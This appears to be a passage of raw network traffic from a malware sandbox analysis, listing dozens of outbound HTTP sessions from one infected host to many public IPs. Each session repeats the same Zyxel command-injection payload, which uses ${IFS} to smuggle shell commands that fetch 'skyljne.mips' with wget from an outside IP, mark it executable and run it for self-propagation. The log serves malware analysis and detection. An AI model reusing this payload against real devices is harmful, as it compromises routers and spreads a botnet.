                                    Jan 13, 2024 19:02:38.264550924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5306192.168.2.1333024108.16.207.250443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.264585018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5307192.168.2.1360318176.121.34.219443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.264643908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5308192.168.2.133313242.64.22.114443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.264684916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5309192.168.2.1332968101.76.52.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.264725924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5310192.168.2.1356894202.55.41.190443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.264776945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5311192.168.2.1339714133.5.145.100443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.264816046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5312192.168.2.1345822117.178.115.222443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.264888048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5313192.168.2.1360112210.168.66.252443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.264947891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5314192.168.2.1340916211.39.15.146443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.265018940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5315192.168.2.1355794122.240.249.120443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.265073061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5316192.168.2.1337710115.203.203.165443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.265126944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5317192.168.2.1344028145.255.92.205443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.265180111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5318192.168.2.1340934200.188.235.78443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.265243053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5319192.168.2.1353610119.25.3.178443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.265314102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5320192.168.2.134252683.188.111.154443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.265381098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5321192.168.2.1336124175.99.120.245443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.265384912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5322192.168.2.1342852130.23.61.81443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.265422106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5323192.168.2.1333310158.188.235.92443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.265484095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5324192.168.2.134756288.24.96.90443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.265532017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5325192.168.2.135000660.40.208.217443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.265577078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5326192.168.2.1341832103.39.81.181443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.265619040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5327192.168.2.135667645.43.153.189443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.265666962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5328192.168.2.1350502192.60.23.186443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.265713930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5329192.168.2.1342854141.208.202.201443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.265795946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5330192.168.2.1334404114.212.144.116443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.265820980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5331192.168.2.135589485.220.246.255443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.265877962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5332192.168.2.135686223.246.9.248443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.265933037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5333192.168.2.134956051.98.240.182443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.265969992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5334192.168.2.1335800194.202.234.115443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.266057968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5335192.168.2.133362452.86.249.65443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.266083956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5336192.168.2.13552409.61.88.96443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.266169071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5337192.168.2.1357924209.43.69.41443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.266169071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5338192.168.2.134525679.211.127.29443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.266220093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5339192.168.2.134591677.196.60.49443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.266285896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5340192.168.2.135579688.59.30.156443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.266356945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5341192.168.2.1340542221.238.56.73443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.266395092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5342192.168.2.134860098.83.38.171443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.266457081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5343192.168.2.135617460.147.239.175443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.266498089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5344192.168.2.1339468126.185.228.158443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.266520977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5345192.168.2.1351796193.44.90.106443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.266604900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5346192.168.2.1358184169.136.130.251443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.266630888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5347192.168.2.1352708154.150.110.195443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.266686916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5348192.168.2.134418044.166.112.159443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.266717911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5349192.168.2.1359204164.229.90.12443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.266787052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5350192.168.2.1353926160.210.191.73443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.266851902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5351192.168.2.1354936142.72.64.59443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.266890049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5352192.168.2.1360562186.3.24.46443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.266944885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5353192.168.2.1360786184.220.204.57443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.266974926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5354192.168.2.1338006155.120.6.167443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.267039061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5355192.168.2.134392091.255.132.40443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.267107010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5356192.168.2.134624287.174.20.41443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.267167091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5357192.168.2.133520425.165.219.82443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.267234087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5358192.168.2.1359114202.149.74.128443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.267276049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5359192.168.2.135659273.166.212.67443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.267313957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5360192.168.2.135176841.254.185.21443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.267394066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5361192.168.2.134270442.120.72.239443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.267441034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5362192.168.2.135006464.177.105.127443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.267482042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5363192.168.2.1344146187.148.56.169443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.267539978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5364192.168.2.133777494.89.113.85443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.267596006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5365192.168.2.13521868.88.165.190443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.267636061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5366192.168.2.135049269.193.113.234443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.267683029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5367192.168.2.133338691.165.75.236443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.267735958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5368192.168.2.1340640133.34.37.69443
                                    TimestampBytes transferredDirectionData
